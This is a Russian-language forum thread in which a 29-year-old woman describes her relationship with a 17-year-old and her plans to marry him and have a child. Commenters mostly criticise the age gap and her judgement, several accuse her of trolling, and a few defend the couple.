Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-09 13:41:47 от Гость
Всем доброго времени суток!)) Нужен совет по воспитанию сына. Сыну через 1, 5 месяца исполнится 9 лет. В последнее время все чаще замечаю, что не справляюсь с ним. Он очень изменился. Раньше, в более маленьком возрасте был очень добрым, любознательны ... Подробнее
Последний комментарий
5436Жена ингуша, Мне интересен момент когда она в машине иголки втыкала. У нее есть ключи от машины Саши?А что если б поставить камеру там какую нибудь скрытую и запечатлить на нее такое с участием Маши?Саша надеюсь не попрет против видео?И не скажет что это не она. Есть ведь наверное места где она люби ... Все комментарии67693
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
Демодекоз
вчера в 17:07:592016-12-10 17:07:59
ШЛЮХА
08 декабря в 21:42:56
Помоги советом
08 декабря в 21:35:34
Комедия
07 декабря в 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Истории о любви : малой...     здравствуйте!!!
как то писала свою историю... "просто поцелуи с другом... ", хочу написать продолжение.
мы вместе.
ну как, вместе... он учится в городе, видимся конечно редко... но каждый день переписываемся, созваниваемся.... шлем фото, видео.... друг другу.
ему 17...мне 29....
с Мужем разошлась, из-за любимого.... хотим подать заявление... когда ему будет 18.... немного позже хотим ребенка... он очень хочет, безумно....
но чем ближе это время... тем больше беспокоит вопрос -правильно ли я делаю?!....
сколько раз думала отпустить его, думаю, пусть встречается, гуляет, как его сверсники.....
но он не хочет! говорит, не сможет без меня...
да и я... ни хочу никого другого.... люблю очень сильно....
может у кого подобные ситуации были???...
каков итог?....
62068
Другие Истории о любви
Комментариев: 104
Страница : 1 [2]
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
22 ноября 2015 20:34:41
2015-11-22 20:34:41

Сейчас вспомнила была тут история тоже парню лет мало было, она старше его лет 30 она наверно. Поженились и на сколько я помню что то там не удачно у них сложилось. Он в армию помойму ушел потом вернулся и гулять захотелось ему. Название не помню. Но что то такое было. И любовь у них там вроде не земная сначала была.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
22 ноября 2015 20:49:31
2015-11-22 20:49:31

Неалина, да даже если парень и реально испытывает чувства, что не факт, то очень быстро все может поменяться! Сегодня у него симпатия, чувства к автору, он ей рассказывает, что не сможет без нее, а завтра он тоже самое будет рассказывать другой уже! Ему 17 лет, куда ему жениться и тем более куда вот детей? Порой слушаешь 25-30-летних, а они многие говорят, что им жениться рано, что гулять хотят, а тут 17-летний хочет жениться и детей! Ну, прям нонсенс и сказка! В 17 лет у него там только гормоны должны играть и хотеться ему может только одного...

Да вообще в историю не очень верится! Неужели автор в свои 29 на столько глупа, что ушла от якобы мужа к 17-летнего пацанчику, с которым уже готова в ЗАГС бежать и даже рожать от него, не думаю ни о последствиях, ни о том, а как и на какие деньги они будут жить!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
22 ноября 2015 20:55:51
2015-11-22 20:55:51

Автор, прочитала вашу первую историю!

А у вас есть еще и дочь значит? А ваш пацанчик готов принять вашу дочь? Теперь еще и дочь вашу оказывается нужно обеспечивать!

Автор, а вы с ним из-за поцелуев? Вся ваша прошлая история только о его поцелуях! У вас к нему страсть похоже, а у него уж тем более страсть, а вы в Загс быстрее бежать собрались! Может пока просто повстречаться и не торопить события? А то пройдет годик и страсть у вас появится еще к кому-то третьему, а у него уж тем более! Вы с мужем то развелись уже?

Да и какой у него характер то идеальный? Вы с ним не жили, не знаете вы его! Вы просто идеализируете! Поживете, побудете в более близких отношениях и по другому посмотрите на вещи! Ваше мнение о нем изменится скорее всего!

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
22 ноября 2015 21:04:07
2015-11-22 21:04:07

Читательница , Тут еще вопрос в том пойдет ли парнишка в армию служить?

А так согласна с тобой. Мальчик молоденький еще. Моим по 19 старшим, еще не думают о том как бы женится. Хотят сначала жилье и прочее приобрести а не женится. А тут 17 лет!Конечно ему рановато. Тем более парнишки позже взрослеют. А некоторые посмотришь всю жизнь как дети.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
22 ноября 2015 21:10:41
2015-11-22 21:10:41

Неалина, да, так и есть, что часть из них всю жизнь дети и ищут себе мамку, которая будет обихаживать их! НО ищут они ее позже, а не в 17 лет! В 17 лет там другие ценности, другие приоритеты! У тебя вон дети старше и то жениться не хотят, а тут прям горит желанием!

Автор и так старше на 12 лет, а считается, что парни года на 4 позже взрослеют девушек, так выходит, что вообще разница чуть ли не в 16 лет, а ему на деле не 17, а 13. Ну, какой вот из него отец? Очень мало какой парень в 17 лет сможет быть действительно отцом и ему действительно нужна будет семья... В 17 лет гулянки, друзья и пьянки... А если даже и нужна пока что семья, то он из нее может быстро сбежать! Это все ни так просто, как кажется! Отношения труд, каждодневный труд, где кто-то должен уступать, где кто-то должен понимать, быть терпемее, мудрее, что взрослым не всегда под силу это, а тут 17 лет ему всего!

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
22 ноября 2015 21:20:46
2015-11-22 21:20:46

Читательница , В такие годы они чаще по беременности девушки женятся такой же не опытной как и они сами.

А тут да еще не работы, ничего а уже женится очень хочет и детей. Тем более у автора есть уже ребенок. Куда ему двоих в таком возрасте?Сам еще ребенок. У меня вон первый бывший в 19 лет папой стал. Ему сейчас почти 40, он все еще себя отцом не чувствует. Подружка говорит ему все еще бегать куда то надо.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Татьяна Syxaya
19698 Татьяна Syxaya
Татьяна Syxaya offline
Репутация : 40103
Комментариев 349 3
22 ноября 2015 21:21:12
2015-11-22 21:21:12

Я в основном согласна с Читательницей и Неалиной, только мне вот еще почему-то кажется, что он вам по ушам проехал хорошо. В 17 лет для мальчиков считается очень круто иметь взрослую тетю. Сказать что угодно можно. А факт, что вы были замужем делает его вообще "ну просто мега крутым" в глазах его ровесников и друзей. А вот вас... нет... Не в обиду. конечно, но это так.

Ответить
Поддерживаю Да3 / Нет0
Edite, bibite, post mortem nulla voluptas
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
22 ноября 2015 21:26:53
2015-11-22 21:26:53

Татьяна Syxaya, Я тоже думаю, что он с ней опыта набирается в постели. А автор уже себе замужество с ним в мечтах нарисовала и ребенка от него родить. Ну пусть родит. Потом одна их воспитывать будет.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Белый Волк
16983 Белый Волк
Белый Волк offline
Репутация : 24173
Комментариев 212 31
22 ноября 2015 21:28:48
2015-11-22 21:28:48

Ну раз вы с мужем разошлись из-за 17-него мальчугана... Попробуйте тогда с парнем пожить, только выходить за него замуж и тем более рожать от него не советую... Время покажет, сами поймете что к чему и что стоят его слова...

Бы вают люди очень жизненно умудренные и серьезные не по годам, но очень редко... Время всё расставит по своим местам...

Ответить
Поддерживаю Да0 / Нет0
Не пройдя через разочарования, Не познать Истинного Счастья...
Татьяна Syxaya
19698 Татьяна Syxaya
Татьяна Syxaya offline
Репутация : 40103
Комментариев 349 3
22 ноября 2015 21:32:13
2015-11-22 21:32:13

Неалина, да так и будет. У меня дядя так отжигал, когда ему было 16 лет. Спал с 25-летней. Тоже ей говорил, что женится на ней. Родители в шоке были. А на деле он женился в 22 года. На другой.

Ответить
Поддерживаю Да2 / Нет0
Edite, bibite, post mortem nulla voluptas
Kyrsoved
Kyrsoved

22 ноября 2015 21:43:20
2015-11-22 21:43:20
Автор в вдруг вы родственные души? Это очень и очень много в союзе. Плывите по течению. а там видно будет.
Ответить
Поддерживаю Да0 / Нет2
Yo
Yo

22 ноября 2015 21:43:30
2015-11-22 21:43:30
Если историю напишет 29-и летний мужчина, который встречается с 17-и летней девушкой, думаю коментарии были бы совсем другие. Статья за развращение малолетних. В этой ситуации суть таже, а коментарии , ой как оличаются.
Ответить
Поддерживаю Да0 / Нет1
Капец...
Капец...

22 ноября 2015 21:43:40
2015-11-22 21:43:40
Да, правильно говорят предыдущие комментаторы. Не спорю, Он сейчас глуп... но потом он поймет что с вами терял время попусту, что рядом его окружают 20-летние красотки. а вам уже будет 30. Он будет чувствовать разницу.. и он тебя бросит. И ты за это время могла бы найти себе хорошего мужа, таких же лет как и тебе и было бы все замечательно. Конечно может я ошибаюсь, но все таки можно прислушаться не много...
Ответить
Поддерживаю Да3 / Нет0
Гость
Гость

22 ноября 2015 21:43:53
2015-11-22 21:43:53
Вам 40 будет ему 28, вот и думайте.
Ответить
Поддерживаю Да1 / Нет1
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
22 ноября 2015 22:35:46
2015-11-22 22:35:46

Знаю масссу примеров таких неравных браков, когда женщина старше. Все они закончились разводами. Это ненормально, у мужчины женщина должна вызывать желание любить и восхищаться, а не сыновьи чувства.

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Таня
Таня

22 ноября 2015 22:47:43
2015-11-22 22:47:43
мой муж... от которого ушла... на пять лет младше меня. дочь у нас родилась, когда ему было 17. мне было 22. и ушла от него я... не он. банально, но мы абсолютно разные. в свое оправдание могу сказать... я Люблю... ничего не могу сделать. и верю своему парню... правильно написали, что со временем будет конечно видно, и дело не в разнице в возрасте. главное душевное сходство людей... сможем ли мы вместе. пока всё хорошо... моя мама видела ситуацию с Самого начала. она женщина вообще очень критичная... ей сложно угодить. но в этой ситуации поддерживает. говорит, что не важно сколько лет между людьми... если это конечно не из ряда вон выходящая ситуация. считает, конечно, что нужно подождать 18.... это важно. а по поводу встречаний... по закону уже можно с 16 лет иметь личные отношения...
Ответить
Поддерживаю Да0 / Нет1
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
22 ноября 2015 23:56:43
2015-11-22 23:56:43

Татьяна Syxaya, крутым делает даже ни столько факт, что она замужняя, а что он эту замужнюю отбил у мужа! Он потешил свое эго, свое самолюбие, почувствовал себя самцом!

Татьяна Syxaya, вот-вот, я тоже знаю кучу таких, которые выбирают девушек постарше для секса, рассказывая им про серьезные отношения и про брак, а на деле - это фигня все, по ушам ездят!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
парень
парень

22 ноября 2015 23:59:04
2015-11-22 23:59:04
Я конечно понимаю что вы тут , всё через чур умные , всякой ерундой мозги забивает , я понимаю что для вас это странно разница в возрасте , вы просто не были в такой ситуации , А я очень сильно люблю свою девушку и мне никто кроме неё не нужен !!!! И я не вру , мы уже жили вместе , нас всё устраивает , скажу вам больше мы без ума друг от друга ... Я расстался с девушкой из-за Тани... Таня ушла от мужа .... А кто сказал что она " глупая или я глупой " сами вы такие не далёкого ума , тут пишут истории что бы поделиться с людьми , а вы ерунду какую то пишите , критекуете постоянно , вам делать нечего .... ??? Мозги людям пудрите , из-за таких критиков как ты , люди и ссорятся , расходятся , хотя до этого всё было хорошо , много случаев когда из-за советов людей , даже самые сильные пары расходятся ... И разница в возрасте это не помеха , и никогда помехой не была , эта наша жизнь , мы как нибудь сами решим что нам делать , идти в Загс или нет , рожать детей или нет .... Я понимаю что многие здесь хотят помочь посоветовать , но поверьте , вы не советуете а только портите всё !!!!!
Ответить
Поддерживаю Да0 / Нет4
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
22 ноября 2015 23:59:10
2015-11-22 23:59:10

Таня, вы не слушайте Kyrsoved, она вам наговорит, она как в каждой бочке затычка, у нее и измены - это норма, и групповухи - это тоже норма. Человек сам не знает, что несет! Вот и задумайтесь, а стоит ли ее слушать, тем более, когда вам куча людей говорят совсем другое и один какой-то гость чушь! Просто вы принимаете то мнение, которое вам удобно и нравится, но мозг при этом не включаете! Только если вы слушать не хотите, то зачем сюда написали вообще не понятно, делали бы сами, что хотите!

Нельзя никак в такой ситуации совсем закрывать глаза на возраст! Правильно, давайте вообще 16-летнего ребенка выберем! А что мелочиться то, с 16 ведь уже можно! Вот только не забывайте, что вы уже не девочка и вам уже не 16 лет! Вы взрослая дама, которая в силу возраста и опыта должна бы умнее и мудрее юнца, который вам по ушам ездит!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
23 ноября 2015 00:00:12
2015-11-23 00:00:12

Yo, не сравнивайте девушку и парня! Это совсем разные ситуации, разные обстоятельства дела! 1. Девушка в 16 часто против секса могут быть, а парень почти никогда от халявного секса не откажется! 2. Беременеть то не этому малолетнему парню... 3. Когда мужчина старше, то у отношений есть шанс, а когда девушка, то обычно отношения плохо заканчиваются, рано или поздно парень находит помоложе, печально, то часто это именно так и это при условии, что отношения вообще будут, а не просто тупо секс!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
23 ноября 2015 00:05:25
2015-11-23 00:05:25

Ахахаххахахаххаха, я ржу! Я под столом!{#} Вот и парень защитник появился!{#} парень. Знаете сколько у нас таких историй, где защитники-родственники или мужья, жены появляются?{#} Это было, во-первых. А, во-вторых, по стилю написания текста видно, что Таня, и парень, - это одно лицо!

Вот вы и спалились!!!!! А я изначально говорила, что ваша история не правда и провокация! Перестаньте троллить! Тратить время пользователей! И забивать "эфир" своими выдумками! Смотрите, жизнь то штука такая, она мысли материализует! Случится с вами какая-нибудь фигня и будете знать! Успокойтесь уже и не тролльте больше!

Ответить
Поддерживаю Да8 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
23 ноября 2015 00:08:05
2015-11-23 00:08:05

Татьяна Syxaya, Это автор нам тут по ушам ездит!{#}

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Тришка
6669 Тришка
ТРИШКА offline
Репутация : 42573
Комментариев 747 11
23 ноября 2015 01:41:54
2015-11-23 01:41:54

ДУРДОМ!

ПОЖАЛЕЙ ПАРНЯ АВТОР. ДАЙ ЕМУ НАГУЛЯТЬСЯ.

НАЙДИ СЕБЕ МУЖИКА А НЕ ПАЦАНА!

Ответить
Поддерживаю Да2 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 449135
Комментариев 7674 30
23 ноября 2015 05:52:48
2015-11-23 05:52:48

Читательница , Ой я и такое пропустила{#}. Не умно автор сделала. Сначала совета как бы спросила анонимно, а потом того же парнишку позвала.{#}Обалдеть!И уже забылись все сомнения что были написаны в начале. И виноваты мы стали. Вот и комментируй истории.

Ответить
Поддерживаю Да3 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Таня
Таня

23 ноября 2015 11:31:10
2015-11-23 11:31:10
)))))) вопрос то был совсем в другом... были ли подобные истории у кого то, и каков итог... а оскорбить, назвать глупой, может каждый... наверное, у вас жизнь идеальна... отвечать нужно по вопросу, человеку, который "пришел" сюда... а не осуждать в таких контекстах.... в конце концов -вы нас не видите, и не знаете.... верно?... по поводу денег, и всего прочего... уж наверняка логично, что об этом думали! или я в 29 просто буду жить одним днем!?.... я прекрасно всё осознаю. мне интересно было, были ли подобные истории у родственников, знакомых... и что получилось. вот и все. по поводу критиков... к вам отношусь нормально. не нужно только оскарблять, писать что я глупая, бред, пожалейте парня.... и тд. я не считаю во первых себя такой уж и плохой, что бы его жалеть, а во вторых -это его выбор. да, бывают моменты, что я думаю о том, что бы "дать ему нагуляться... ".... я об этом писала.... но ни он, ни я, не сможем на данный момент друг без друга.
Ответить
Поддерживаю Да0 / Нет1
Татьяна Syxaya
19698 Татьяна Syxaya
Татьяна Syxaya offline
Репутация : 40103
Комментариев 349 3
23 ноября 2015 13:29:23
2015-11-23 13:29:23

Читательница , да уж.. Вот у людей мозги плавятся от скуки.

Ответить
Поддерживаю Да2 / Нет0
Edite, bibite, post mortem nulla voluptas
Персиянка
19697 Персиянка
Персиянка offline
Репутация : 13460
Комментариев 362 20
23 ноября 2015 14:11:18
2015-11-23 14:11:18

Уже к молодому человеку обращаюсь. Вы понимаете, почему такие коменты? Вы не рвите здесь всех. Люди пишут вам со ступенек своего возраста, когда 17 нужно умножить на 2, а то и на 3. Дело не в том что вам 17, а в том, что вы не знаете, как невозможно открыть глаза в 8 утра, потому что, всю ночь кричал малыш. Как захочется с друзьями поехать на вылазку, но нужно будет помогать жене с домашними делами. И так далее, я думаю ясно. Вы все это знаете только в теории, не в практике. До 18 целый год, год это очень много, проживите его. Через год многое может измениться.

Ответить
Поддерживаю Да0 / Нет0
Относитесь сочувственно к мыслям и желаниям других.
Violetta
14552 Violetta
Violetta offline
Репутация : 1249999
Комментариев 8873 0
23 ноября 2015 19:11:17
2015-11-23 19:11:17

Цирк в огнях.

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
23 ноября 2015 20:30:01
2015-11-23 20:30:01

И как , интересно, парень сюда попал..... Видно Тане не понравился ход комментариев, что её розами тут не засыпали, и она таким образом начинает воспитывать своего маленького будущего мужа, зарегестрируйся на том сайте, говорит, и защити меня, а то там на меня наехали...{#}Ой, кони на балконе)

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58481
Комментариев 900 1
23 ноября 2015 20:46:12
2015-11-23 20:46:12

А Вы тут всё тролите.. Эх.. Хорошо Вам...

Ответить
Поддерживаю Да2 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Таня
Таня

23 ноября 2015 21:23:13
2015-11-23 21:23:13
не цирк... а жизнь. \r\nу вас всё идеально?...
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

23 ноября 2015 21:24:07
2015-11-23 21:24:07
Странная_Такая , да не, не защити))) а напиши свое мнение))) меня не нужно розами засыпать, всего навсего по вопросу ответить. а не писать -не в тему... это называется у вас "совет "?...
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

23 ноября 2015 21:24:12
2015-11-23 21:24:12
как интересно... какая жизнь у тех, кто осуждает тут.... ?))))))))))....... причем осуждают, за любовь)
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

23 ноября 2015 21:24:34
2015-11-23 21:24:34
не, не тролим))) правду пишем
Ответить
Поддерживаю Да0 / Нет1
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
23 ноября 2015 21:35:05
2015-11-23 21:35:05

Таня, Мое виденье Вашей ситуации я написала в первом своем комменте, а потом , когда поняла, что Вы нас обманываете, начала выгоняться с Вас как Вы с нас) Всё просто)

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58481
Комментариев 900 1
23 ноября 2015 21:36:42
2015-11-23 21:36:42

Таня, да какая любовь нафиг у пацана 17-ти летнего может быть к 29-ти летней девушке? Он блин девственности лешился пару лет назад и не каждая одноклассница наверно ещё дает, в мозгах у него ещё ЕГЭ не прошел, а армия уже на носу. Пацаны тролят по поводу отсутствия девченки наверно еще. А тут на те *** в томате, взрослая девушка решила молодость вспомнить)))) Надо значит ей в уши бульона налить о вечной любви, красивой семье и прекрасном будущем вместе.

Ответить
Поддерживаю Да3 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
23 ноября 2015 21:41:34
2015-11-23 21:41:34

Таня, А его мнение еще не учитывается. Ни в суде, ни здесь. Не дорос ещё его высказывать, хоть и спит с женщинами, годящимися ему в матери. Но от этого он умнее и взрослее не станет! Так ему и передайте от меня)

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58481
Комментариев 900 1
23 ноября 2015 21:50:48
2015-11-23 21:50:48

Странная_Такая , так он и сам же прочитать Ваш комментарий сможет завтра после школы))) А того глядишь еще и ругаться с Вами начнёт, ибо не имеет право женщина указывать мужику его место)))))))))))))))))))

Ответить
Поддерживаю Да3 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
23 ноября 2015 21:54:21
2015-11-23 21:54:21

Проходил мимо, А я может и не женщина вовсе{#}При такой популляции троллей на этом сайте в последнее время, я могу оказаться близнецом Валуева в застираных трениках)

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58481
Комментариев 900 1
23 ноября 2015 21:57:23
2015-11-23 21:57:23

Странная_Такая , не Кличко и главное. У каждого есть свои недостатки {#}

Ответить
Поддерживаю Да3 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Violetta
14552 Violetta
Violetta offline
Репутация : 1249999
Комментариев 8873 0
23 ноября 2015 23:29:21
2015-11-23 23:29:21

Таня, а где ваш малой? почему тельняшку на груди не рвет за вас?

Ответить
Поддерживаю Да3 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
23 ноября 2015 23:31:26
2015-11-23 23:31:26

Violetta, Так время уже не детское, спит у Тани под сиськой)

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

23 ноября 2015 23:37:33
2015-11-23 23:37:33
У брата есть подруга, работает учителем в школе. Первого сына родила от ученика, потом через пару лет родила второго сына, уже от другого ученика. Причем ребенок родился, когда парень еще учился в школе. В итоге после школы ее парня забрали в армию, чем дело закончилось не знаю. Если честно, то я в шоке от таких женщин. Автор, у него в 17 лет еще личность то полностью не сформировалась. Если конечно история правда, но вы не боитесь наткнуться на те же самые грабли. Вы первого мужа соблазнили и отцом в 17 лет сделали. Наверно безумно его любили, потом он вырос и оказалось, что вы разные люди. Не знаю каких вы советов ждете?! Что вас по головке погладят, что вы совращаете малолетних. Вы о дочери интересно думаете, а то люблю своего мальчика и ушли от мужа! Я в шоке!!
Ответить
Поддерживаю Да2 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249999
Комментариев 8873 0
23 ноября 2015 23:40:05
2015-11-23 23:40:05

Гость, сколько же лет было этим несчастным?

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Таня
Таня

24 ноября 2015 00:17:39
2015-11-24 00:17:39
да нет... сейчас не под сиськой... а жаль... (((
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

24 ноября 2015 00:17:48
2015-11-24 00:17:48
вы просто поливать грязью здесь "заходите "... идеальноживущие))) ***
Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 00:26:14
2015-11-24 00:26:14

Таня, никто не идеален. А Вы, таня, просто не умеете воспринимать критику)

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58481
Комментариев 900 1
24 ноября 2015 01:08:38
2015-11-24 01:08:38

Таня, а что так? таблицу умножения учит?

Ответить
Поддерживаю Да3 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102823
Комментариев 16198 6
24 ноября 2015 01:22:38
2015-11-24 01:22:38

Проходил мимо, Вот ты, блин, рассмешил!{#}{#}{#}

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 01:25:48
2015-11-24 01:25:48

Проходил мимо, Думаю с ровесницей на дискотеке отжигает. Он же не пойдет в клуб с автором....

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

24 ноября 2015 01:32:34
2015-11-24 01:32:34

Не дай бог конечно такую ситуацию. Но если ты его любишь, и хочешь за него замуж, то зачем ты вообще спрашиваешь мнение других?а если тебе скажут нет?Если ты задаешь такие вопросы, то можно уже сделать заключение, что ты не уверена в своих чувствух. Решать тебе. Но если тебе важно мнение других, то советую тебе годик хотя бы подождать пока ему 18 стукнет. А вообще любви все возрасты покорны. Через годик поженитесь и все норм будет. Молодой муж это даже тебе плюс в будущем.

Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

24 ноября 2015 01:37:53
2015-11-24 01:37:53

Таня, Не обращайте внимания)))Сейчас много злых людей. Не стоит все воспринимать близко к сердцу. Мне кажеться, что у вас все будет хорошо. Еси вы конечно не будете слушать всякие глупости по поводу этого.

Ответить
Поддерживаю Да1 / Нет3
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1675135
Комментариев 6973 37
24 ноября 2015 01:48:34
2015-11-24 01:48:34

Есть у меня в хороших знакомых семья. Она - моя бывшая сотрудница. Кстати, Таня ее зовут. Ей сейчас 36. Когда ей было лет 29 за ней начал настойчиво ухаживать парнишка на 9, 5 лет младше. Она работала кассиром в супермаркете, а он охранником. Долго смотрел, вздыхал, каждое слово ее ловил, в рот заглядывал буквально. Забавно так это выглядело. Над ним все потешались и Таня больше всех. А он настойчиво провожал ее до дома и дарил букеты. Отмалчивался. Потом Таня ему сказала, что это просто смешно, ей нужен серьезный взрослый мужчина, а не ребенок с карьерой охранника.

Ребенок ушел с работы и нашел другую, с хорошим заработком. Собирал ребенок мебель с утра до ночи, устанавливал, ремонтировал. Потом окна начал ставить, балконы утеплять. Руки у него оказались золотые, деньги пошли в золотые руки. Он купил ей кольцо, стал на колено и позвал замуж.

Она пошла. Живут уже 6 лет. Он ее называет исключительно "квіточка моя". Это значит цветочек. Ремонт в квартире сделал, мебель купил, всю технику. Одел свою Таню. Таня сейчас не работает, так, косметику продает для души, на семинары ездит, мастер-классы проводит. Живут, со стороны, очень хорошо. Вот прямо люди как пазлы сложились. Он ей в рот заглядывает, как в день знакомства, она его тоже вылизывает. Он у нее и одет хорошо и накормлен вкусно. Мечтают о детках. Лечатся.

Не знаю, тролль вы или нет. Почему-то думаю, что нет. Но такие истории бывают. Та, что я вам рассказала - абсолютно реальная. Люди живут, счастливы, прямо очень счастливы. Дома у них весело и тепло, там приятно бывать.

Осудить проще всего. А поглумиться здесь особенно любят в последнее время. Правда смеются все больше над шутками собственного сочинения, но это не так важно.

Ваш совсем уж маленький, конечно. Но некоторые в 18 сознательнее и четче знают чего они хотят и как им этого достичь, чем в иные в 30. Мне тяжело себя представить с парнем на 10 лет младше, но я верю, что для любви такое понятие как возраст - это всего лишь цифра.

Ответить
Поддерживаю Да5 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 252185
Комментариев 2484 8
24 ноября 2015 02:09:28
2015-11-24 02:09:28

Сиреневая Кошка, Ему было почти 20 охраннику из Вашей истории, а здесь 17.... Согласна, разница не критичная.. Когда 23 или 26, или даже 20 и 23... А 17 лет - это несовершеннолетний ребенок)Не напрасно существуют возрастные рамки 18 лет и 21, или дураки их придумали?

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

